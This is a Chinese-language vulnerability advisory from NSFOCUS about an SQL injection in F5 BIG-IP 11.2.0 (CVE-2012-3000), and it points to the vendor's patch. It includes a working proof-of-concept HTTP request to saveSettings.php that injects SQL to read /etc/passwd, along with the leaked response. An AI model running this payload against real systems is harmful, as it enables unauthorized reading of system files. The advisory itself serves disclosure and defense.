安全研究

安全漏洞
F5 BIG-IP SQL注入漏洞

发布日期:2013-01-22
更新日期:2013-01-23

受影响系统:
F5 BigIP 11.2.0
描述:
BUGTRAQ  ID: 57500
CVE(CAN) ID: CVE-2012-3000

F5 BIG-IP产品可为企业提供集成的应用交付服务,如加速、安全、访问控制与高可用性。

F5 BIG-IP 11.2.0之前版本没有有效过滤用户输入,在实现上存在SQL注入漏洞,成功利用后可允许攻击者破坏应用、执行未授权操作。

<*来源:S. Viehb&#195;&#182;ck
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

POST /sam/admin/reports/php/saveSettings.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 119

{
    "id": 2,
    "defaultQuery": "XX', ext1=(SELECT MID(LOAD_FILE('/etc/passwd'),0,60)) --
x" }

Note: target fields are only VARCHAR(60) thus MID() is used for extracting
data.

A request to /sam/admin/reports/php/getSettings.php returns the data:

HTTP/1.1 200 OK
...

{success:true,totalCount:1,rows:[{"id":"2","user":"admin","defaultQuery":"XX","ext1":"root:x:0:0:root:\/root:\/bin\/bash\nbin:x:1:1:bin:\/bin:\/sbin\/nol","ext2":""}]}

建议:
厂商补丁:

F5
--
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.f5.com/bigip

浏览次数:4111
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障